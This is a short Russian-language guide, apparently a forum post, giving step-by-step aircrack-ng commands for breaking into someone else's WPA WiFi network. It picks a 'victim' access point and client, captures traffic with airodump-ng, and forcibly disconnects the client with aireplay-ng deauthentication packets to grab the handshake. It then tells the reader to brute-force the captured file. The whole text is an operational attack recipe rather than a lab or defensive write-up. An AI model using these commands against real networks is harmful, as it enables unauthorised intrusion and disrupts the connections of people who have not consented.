1. Останавливаешь wifi адаптер командой:

ifconfig wlanX down (где X это номер твоего адаптера, узнать можно командой ifconfig -a)

2. Убиваешь мешающие процессы командой

airmon-ng wlanX check kill

3. Запускаешь режим мониторинга

airmon-ng start wlanX (появится адаптер mon0)

4. Далее смотришь не спеша по каналам выбирая жертву

airodump-ng mon0 -a -c 6 (-а не показывать неассоциированных клиентов, т.е. просто wifi устройства не подключенные к сети - с 6 - шестой канал, смотреть нужно по каналам так сразу видишь качество приема жертвы на конкретном канале, записываешь мак жертвы: точнее два мака точки доступа и клиента)

5. Выбрав жертву отключаешь аирдамп и запускаешь мониторить именно жертву

airodump-ng mon0 -a -d MM:MM:MM:MM:MM:MM -c 6 -w filename (тут MM:MM:MM:MM:MM:MM mac точки доступа жертвы, канал также шестой нужно поставит на тот на котором сидит жертва, -w записать пойманные данные в файл с именем filename)

6. Одновременно не отключая аирдампа в соседней консоли даешь команду

aireplay-ng mon0 -a MM:MM:MM:MM:MM:MM -c CC:CC:CC:CC:CC:CC -0 5 (тут MM:MM:MM:MM:MM:MM - мак точки доступа жертвы, СС:СС:СС:СС:СС:СС мак клиента жертвы, -0 команда на отключения клиента от точки доступа, 5 - количество попыток отключения) Как дашь команду не торопись подожди минутку смотря на первую консоль, не пойман ли шендшейк, если не пойман то повтори попытку отключения клиента от точки доступа и во второй консоле. После пойманного хендшейка брутишь файл filename.cap. Чем брутить это уже другое дело либо тут выложить кто нибудь да поможет, или самому.

Ну вот вроде все разжевал.

Для отсутствия ошибки fixset channel -1 не подымай основной интерфейс.